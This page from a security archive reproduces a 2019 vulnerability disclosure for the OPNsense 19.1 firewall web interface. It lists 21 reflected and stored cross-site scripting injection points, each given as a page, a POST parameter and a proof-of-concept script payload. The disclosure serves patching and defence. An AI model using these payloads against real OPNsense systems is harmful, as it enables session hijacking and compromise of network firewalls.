OPNsense 19.1 Cross Site Scripting

OPNsense 19.1 Cross Site Scripting: Posted Feb 1, 2019; Authored by Ozer Goker; OPNsense version 19.1 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 1e48a539c9ed21ef9ac9f3037fbf7b082d9418e82ef5ed9c8df574caf19008cb; Download | Favorite | View

OPNsense 19.1 Cross Site Scripting

##################################################################################################################################
# Exploit Title: OPNsense 19.1 | Cross-Site Scripting
# Date: 01.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://opnsense.org
# Software Link:
http://mirror.ams1.nl.leaseweb.net/opnsense/releases/19.1/OPNsense-19.1-OpenSSL-dvd-amd64.iso.bz2
# Version: 19.1
##################################################################################################################################

Introduction
OPNsense is an open source, easy-to-use and easy-to-build FreeBSD based
firewall and routing platform. OPNsense includes most of the features
available in expensive commercial firewalls, and more in many cases. It
brings the rich feature set of commercial offerings with the benefits of
open and verifiable sources.


#################################################################################


XSS details: Reflected & Stored

#################################################################################

XSS1 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
GDrive_GDriveEmail

PAYLOAD
"><script>alert(1)</script>

#################################################################################

XSS2 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
GDrive_GDriveFolderID

PAYLOAD
"><script>alert(2)</script>

#################################################################################

XSS3 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
GDrive_GDriveBackupCount

PAYLOAD
"><script>alert(3)</script>

#################################################################################

XSS4 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_url

PAYLOAD
"><script>alert(4)</script>

#################################################################################

XSS5 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_user

PAYLOAD
"><script>alert(5)</script>

#################################################################################

XSS6 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_password

PAYLOAD
"><script>alert(6)</script>

#################################################################################

XSS7 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_password_encryption

PAYLOAD
"><script>alert(7)</script>

#################################################################################

XSS8 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_backupdir

PAYLOAD
"><script>alert(8)</script>

#################################################################################

XSS9 | Stored

URL
http://192.168.2.200/system_advanced_sysctl.php?act=edit

METHOD
Post

PARAMETER
tunable

PAYLOAD
"><script>alert(9)</script>

#################################################################################

XSS10 | Reflected

URL
http://192.168.2.200/system_advanced_sysctl.php?act=edit

METHOD
Post

PARAMETER
value

PAYLOAD
"><script>alert(10)</script>

#################################################################################

XSS11 | Reflected

URL
http://192.168.2.200/interfaces_vlan_edit.php

METHOD
Post

PARAMETER
tag

PAYLOAD
"><script>alert(11)</script>

#################################################################################

XSS2 | Reflected

URL
http://192.168.2.200/interfaces_vlan_edit.php

METHOD
Post

PARAMETER
descr

PAYLOAD
"><script>alert(12)</script>

#################################################################################

XSS13 | Reflected

URL
http://192.168.2.200/interfaces_vlan_edit.php

METHOD
Post

PARAMETER
vlanif

PAYLOAD
"><script>alert(13)</script>

#################################################################################

XSS14 | Reflected

URL
http://192.168.2.200/diag_ping.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(14)</script>

#################################################################################

XSS15 | Reflected

URL
http://192.168.2.200/diag_traceroute.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(15)</script>

#################################################################################

XSS16 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
category

PAYLOAD
"><script>alert(16)</script>

#################################################################################

XSS17 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
category

PAYLOAD
"><script>alert(17)</script>

#################################################################################

XSS18 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan

METHOD
Post

PARAMETER
category

PAYLOAD
"><script>alert(18)</script>

#################################################################################

XSS19 | Reflected

URL
http://192.168.2.200/vpn_ipsec_settings.php

METHOD
Post

PARAMETER
passthrough_networks%5B%5D

PAYLOAD
<img%20src=x%20onerror=alert(19)>

#################################################################################

XSS20 | Reflected

URL
http://192.168.2.200/ui/monit

METHOD
Post

PARAMETER
mailserver

PAYLOAD
<img src=x onerror=alert(20)>

#################################################################################

XSS21 | Reflected

URL
http://192.168.2.200/ui/proxy

METHOD
Post

PARAMETER
ignoreLogACL

PAYLOAD
<img src=x onerror=alert(21)>

#################################################################################

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

OPNsense 19.1 Cross Site Scripting

OPNsense 19.1 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

OPNsense 19.1 Cross Site Scripting

Share This

OPNsense 19.1 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems